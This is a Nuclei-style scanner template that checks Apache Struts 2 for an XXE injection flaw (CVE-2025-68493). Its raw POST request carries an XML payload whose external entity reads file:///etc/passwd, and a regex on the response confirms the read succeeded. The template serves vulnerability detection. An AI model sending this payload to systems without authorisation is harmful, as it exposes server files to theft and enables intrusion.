id: CVE-2025-68493

info:
  name: Apache Struts 2 - XML External Entity (XXE) Injection
  author: manus
  severity: high
  description: |
    Apache Struts 2 is vulnerable to XXE injection via the DomHelper.parse method. 
    An attacker can exploit this to read arbitrary files from the server.
  reference:
    - https://zone.ci/secarticles/wx/486533.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-68493
  tags: cve,cve2025,struts2,xxe,apache

http:
  - raw:
      - |
        POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

        <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200